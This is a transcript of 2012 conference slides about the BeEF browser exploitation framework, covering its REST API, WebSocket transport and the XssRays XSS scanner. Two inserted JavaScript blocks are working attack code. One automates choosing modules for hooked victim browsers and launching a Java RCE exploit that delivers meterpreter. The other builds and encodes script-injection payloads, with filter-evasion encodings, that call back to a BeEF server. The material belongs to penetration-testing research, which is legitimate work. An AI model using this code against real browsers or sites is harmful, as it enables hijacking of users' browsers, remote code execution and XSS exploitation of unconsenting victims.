Advances in BeEF - AthCon2012

Uploaded by michele-orru, posted 15-May-2015

Transcript
Page 1: Advances in BeEF - AthCon2012

RESTful API, WebSockets, XssRays

Advances in BeEF

2012 - Athens - 4 May 2012

Michele “antisnatchor” Orru’

Saturday, May 5, 12

Page 2

Who am I?

- Senior Security Consultant @ TW SpiderLabs
- BeEF lead core developer
- Application Security researcher
- OpenBSD, Ruby and Javascript addict

- @antisnatchor
- http://antisnatchor.com

Page 3

What is BeEF?

Browser Exploitation Framework

A platform for client-side pwnage, XSS post-exploitation and, more generally, abuse of the victim browser's security context: once a browser is hooked, everything runs with that browser's origin, cookies and network position.

The framework lets the penetration tester pick specific modules (in real time) for each hooked browser, and therefore for each context.

Page 4

What is BeEF? (screenshot)

Page 5

Outline

Page 6

Outline

I. The need to be RESTful: the new API
II. The need to be speedy: WebSockets support
III. I want more XSSs: XssRays enhancements
IV. demos and fun :D

Page 7

The need to be RESTful

- I hate SOAP
- I hate XML-RPC
- I love to use protocol (HTTP) features without reinventing the wheel

Page 8

The need to be RESTful

Ruby + Sinatra + JSON = WIN

  require 'sinatra'

  # one route is one block: GET /to/a/pub answers with the body string
  get '/to/a/pub' do
    "BeER please"
  end

Page 9

The need to be RESTful

- programmatically control BeEF with whatever eats HTTP and JSON (bash + curl?)
- facilitate integration with third-party tools (ZAP?)
- create your own custom UI/GUI (mobile?)

Page 10

The need to be RESTful

More info:
- http://blog.beefproject.com/2012/03/restful-api-from-antisnatchor-with-love.html
- http://blog.beefproject.com/2012/03/restful-api-demo.html

Read the doc, you lazy!
- https://github.com/beefproject/beef/wiki/BeEF-RESTful-API

Page 11

The need to be RESTful: demo time

Pwn hooked browsers with JDK <= 1.6.0_27, driven entirely through the API:

I. get the hooked browsers' type/version/OS/plugins
II. if browserIsIE: createOverlayIframe(Above), else: launchManInTheBrowser
III. if javaEnabled: launchGetSystemInfo
IV. if JDK <= 1.6.0_27: launchRhinoRCE
V. enjoy Java meterpreter
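The five steps above, together with the "control BeEF with whatever eats HTTP and JSON" point from two slides back, as an added example. This is not BeEF's own code nor the script used on stage: the endpoint paths (/api/admin/login, /api/hooks, /api/modules/:session/:module), the JSON shape of the hooks response and the module names are assumptions based on the REST API wiki linked on the previous slide, and the hooks data below is constructed. The planning logic is pure, so it runs offline under Node; the live helpers need Node 18+ for the global fetch.

```javascript
// Added example (not BeEF's code): drive the slide's demo through the BeEF
// RESTful API. Endpoint paths, the /api/hooks JSON shape and the module
// names are assumptions from the 2012 wiki; check them against GET
// /api/modules on the BeEF you are actually talking to.

// Constructed sample of a GET /api/hooks?token=... response (not captured
// from a live BeEF server).
const SAMPLE_HOOKS = {
  "hooked-browsers": {
    online: {
      "0": { id: 1, session: "s-ie8",  name: "IE", version: "8",  os: "Windows", ip: "10.0.0.5" },
      "1": { id: 2, session: "s-ff12", name: "FF", version: "12", os: "Linux",   ip: "10.0.0.6" }
    },
    offline: {}
  }
};

// Step I: the online hooked browsers as a flat list.
function onlineBrowsers(hooks) {
  return Object.values(hooks["hooked-browsers"].online);
}

// "1.6.0_27" -> [1, 6, 0, 27]; a string without digits -> [] (unknown).
function jdkVersionKey(v) {
  return (String(v).match(/\d+/g) || []).map(Number);
}

// Element-wise comparison; a missing trailing component counts as 0, so
// "1.6.0" sorts below "1.6.0_27" and "1.7.0" above it.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Step IV's condition: JDK at or below 1.6.0_27. An unparseable version is
// treated as not vulnerable so the exploit module is never fired blindly.
function jdkVulnerable(version, cutoff = "1.6.0_27") {
  const key = jdkVersionKey(version);
  if (key.length === 0) return false;
  return compareVersions(key, jdkVersionKey(cutoff)) <= 0;
}

// Steps II-V as the ordered list of module names to launch for one browser.
// javaEnabled comes from the hook details and jdkVersion from the result of
// Get System Info; the caller passes both because their JSON keys are not
// shown on the slides (assumption).
function planForBrowser(browser, javaEnabled, jdkVersion) {
  const plan = [browser.name === "IE" ? "Overlay Iframe (Above)" : "Man-In-The-Browser"];
  if (!javaEnabled) return plan;
  plan.push("Get System Info");
  if (jdkVersion !== undefined && jdkVulnerable(jdkVersion)) plan.push("Rhino RCE"); // step V: Java meterpreter
  return plan;
}

// Live helpers (assumed endpoints; not exercised offline). The token from
// the login call authenticates every later request.
async function beefLogin(base, username, password) {
  const r = await fetch(`${base}/api/admin/login`, {
    method: "POST", headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ username, password })
  });
  return (await r.json()).token;
}

async function getHooks(base, token) {
  return (await fetch(`${base}/api/hooks?token=${encodeURIComponent(token)}`)).json();
}

async function launchModule(base, token, session, moduleId, params = {}) {
  const r = await fetch(`${base}/api/modules/${session}/${moduleId}?token=${encodeURIComponent(token)}`, {
    method: "POST", headers: { "Content-Type": "application/json" },
    body: JSON.stringify(params)
  });
  return r.json(); // assumed shape: {"success":true,"command_id":N}
}

// Offline run over the constructed sample.
for (const b of onlineBrowsers(SAMPLE_HOOKS)) {
  console.log(b.session, b.name, planForBrowser(b, true, "1.6.0_27").join(" -> "));
}
```

Numeric module ids, not names, go into launchModule: resolve them once from GET /api/modules and keep the mapping, since ids are per-installation.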

Page 12

The need to be speedy: WS

BeEF's communication channel uses XHR-polling: the hook polls the server on a timer, and each command round trip is a full HTTP request/response.

Pros:
- works everywhere (we support IE, Chrome, Safari, Firefox, Opera and mobile browsers)

Cons:
- not efficient: every poll carries full HTTP headers even when there is nothing to send, and a command waits up to one polling interval before the hook picks it up

Page 13

The need to be speedy: WS

Meet WebSocket support in BeEF

(diagram: XHR-polling)

Page 14

The need to be speedy: WS

Meet WebSocket support in BeEF

(diagram: XHR-polling vs WebSockets)

Page 15

The need to be speedy: WS

If beef.browser.hasWebSocket(), don't use XHR-polling: open a WebSocket channel instead

currently supported: Firefox, Chrome, Safari
also MozWebSocket (damn prefixes #$*(%$)

speaks hixie-75, hixie-76, hybi-07, hybi-10

Page 16

The need to be speedy: WS

still experimental in BeEF (bugfixing/testing phase)
clone https://github.com/radoen/beef-radoen to give it a try

opens a whole new range of possible features:
- real-time VNC-like hooked browser control
- faster Tunneling proxy (fuzzing through the hooked browser 4/5 times faster)
- generally faster communication

Page 17

The need to be speedy: WS: demo time

- launch 1000 return_long_string modules, both over normal XHR-polling and over WebSockets

Page 18

I want more XSSs: XssRays

Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner, then integrated into BeEF.

XssRays parses all the links and forms of the page it is loaded in and checks for XSS in GET and POST parameters, and also in the URI path, by creating hidden iframes that load each injected request.

Who uses FrameBusting/X-Frame-Options out there :-)?

Page 19

I want more XSSs: XssRays

We inject a vector that contacts BeEF back only if the injected JS actually executes (which is what confirms the XSS). That also makes the results false-positive free.

Potential false negatives, since we inject the vectors blindly.

Concretely, the vector sets the document.location.href of the injected iframe to a known BeEF resource; the request for that resource is the confirmation.

Page 20

I want more XSSs: XssRays (screenshot)

Page 21

I want more XSSs: XssRays

It also works cross-domain (respecting the SOP): the scanner never needs to read the content of a cross-origin iframe, because the callback to BeEF is the only signal it relies on.

Page 22

I want more XSSs: XssRays

Enhancements from previous months:
- added more attack vectors: double URL encoded, double nibble hex, DOM-based injections
- added Chrome/Safari support, base64'ing the iframe src in order to bypass the XSS filter
- added IE6 to IE9 support: did you know that in IE6 location.pathname doesn't contain the leading forward slash? (thanks Gareth)
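The scan plan and the callback-based confirmation described on the last five slides, as an added example that is not XssRays' own code. The BeEF origin and callback resource (/xssrays/hit), the vector text and the encodings list are assumptions; the page object below is a constructed stand-in for the DOM a real scan reads (its pathname deliberately lacks the leading slash, as IE6 reports it), and the callback log is constructed too. Everything runs offline under Node; loading each request in a hidden iframe is the one step a real scanner adds.

```javascript
// Added example (not XssRays' code): enumerate injection points, build one
// attempt per (point, encoding) whose payload calls BeEF back with the
// attempt id, and match callback hits to attempts. BEEF, CALLBACK_PATH,
// PAGE and HITS are all constructed for this example.
const BEEF = "http://127.0.0.1:3000";       // assumed BeEF origin
const CALLBACK_PATH = "/xssrays/hit";       // assumed resource that records a confirmed execution

// Constructed stand-in for the hooked page; pathname is IE6-style (no leading slash).
const PAGE = {
  location: { protocol: "http:", host: "victim.example", pathname: "account/view" },
  links: [
    "http://victim.example/search?q=shoes&page=2",
    "/profile/123",
    "http://other.example/item?id=7"      // cross-origin target: only the callback can confirm it
  ],
  forms: [{ action: "/comment", method: "post", fields: ["body", "author"] }]
};

// IE6 quirk from the slide: put the leading slash back before resolving
// relative links, or "account/view" turns the host into "victim.exampleaccount".
function normalizePathname(p) {
  return p.charAt(0) === "/" ? p : "/" + p;
}

function absolutize(href, loc) {
  return new URL(href, `${loc.protocol}//${loc.host}${normalizePathname(loc.pathname)}`).href;
}

// Double nibble hex: each hex digit of the percent-encoding is itself
// percent-encoded, so "/" (0x2F) becomes %%32%46.
function doubleNibbleHex(s) {
  return Array.from(Buffer.from(s, "utf8"), b => {
    const [h1, h2] = b.toString(16).toUpperCase().padStart(2, "0");
    return `%%${h1.charCodeAt(0).toString(16)}%${h2.charCodeAt(0).toString(16)}`;
  }).join("");
}

// The vector, once it runs, points the iframe's document at the callback.
function payloadFor(callbackUrl) {
  return `"'><script>document.location.href='${callbackUrl}'</script>`;
}

const ENCODINGS = {
  plain: s => s,
  url: s => encodeURIComponent(s),
  "double-url": s => encodeURIComponent(encodeURIComponent(s)),
  "double-nibble": doubleNibbleHex
};

// Every GET parameter, every path segment, the fragment (for DOM sinks that
// read location.hash) and every form field is a candidate injection point.
function injectionPoints(page) {
  const points = [];
  for (const href of page.links) {
    const u = new URL(absolutize(href, page.location));
    for (const name of u.searchParams.keys()) points.push({ method: "GET", url: u.href, kind: "query", name });
    u.pathname.split("/").forEach((seg, i) => { if (seg) points.push({ method: "GET", url: u.href, kind: "path", name: String(i) }); });
    points.push({ method: "GET", url: u.href, kind: "fragment", name: "#" });
  }
  for (const f of page.forms) {
    const action = absolutize(f.action, page.location);
    for (const name of f.fields) points.push({ method: f.method.toUpperCase(), url: action, kind: "form", name });
  }
  return points;
}

// Substitute the encoded vector into the point; the URL object applies the
// single layer of encoding any request carries.
function buildRequest(point, value) {
  const u = new URL(point.url);
  switch (point.kind) {
    case "query": u.searchParams.set(point.name, value); return { method: "GET", url: u.href };
    case "path": { const segs = u.pathname.split("/"); segs[Number(point.name)] = value; u.pathname = segs.join("/"); return { method: "GET", url: u.href }; }
    case "fragment": u.hash = value; return { method: "GET", url: u.href };
    default: return { method: point.method, url: point.url, body: { [point.name]: value } };
  }
}

function buildAttempts(page) {
  const attempts = [];
  for (const point of injectionPoints(page)) {
    for (const [encoding, encode] of Object.entries(ENCODINGS)) {
      const id = attempts.length;
      const value = encode(payloadFor(`${BEEF}${CALLBACK_PATH}?id=${id}`));
      attempts.push({ id, point, encoding, request: buildRequest(point, value) });
    }
  }
  return attempts;
}

// A callback hit is the only confirmation: the vector reaches BeEF only if the
// injected script executed, so no false positives. Attempts without a hit are
// merely unconfirmed (possible false negatives, since vectors are injected blindly).
function confirmed(attempts, callbackHits) {
  const ids = new Set(callbackHits.map(h => Number(new URL(h, BEEF).searchParams.get("id"))));
  return attempts.filter(a => ids.has(a.id));
}

// Constructed callback log: two requests that reached BEEF + CALLBACK_PATH.
const HITS = ["/xssrays/hit?id=1", "/xssrays/hit?id=9"];

const attempts = buildAttempts(PAGE);
console.log(attempts.length, "attempts over", injectionPoints(PAGE).length, "injection points");
for (const a of confirmed(attempts, HITS)) console.log(`XSS confirmed: ${a.point.method} ${a.point.url} ${a.point.kind}=${a.point.name} (${a.encoding})`);
```

Note that the cross-origin link produces attempts like any other: the scanner never reads other.example's response, it only waits for other.example to send the browser to the BeEF callback, which is how the scan stays inside the same-origin policy.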

Page 23

Thanks

Thanks to my BeEFfy friends: Wade, Christian, Brendan, Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may have forgotten

Our new blogger Heather P.

SpiderLabs because I don’t have to take holidays to be here

Special thanks to Kyprianos and Chris

Page 24

Thanks

(Please note: we'll not pay you. You know we love OpenSource :-)

follow us: @beefproject
main site: http://beefproject.com
the new blog: http://blog.beefproject.com
github page: https://github.com/beefproject/beef

Page 25

Questions?
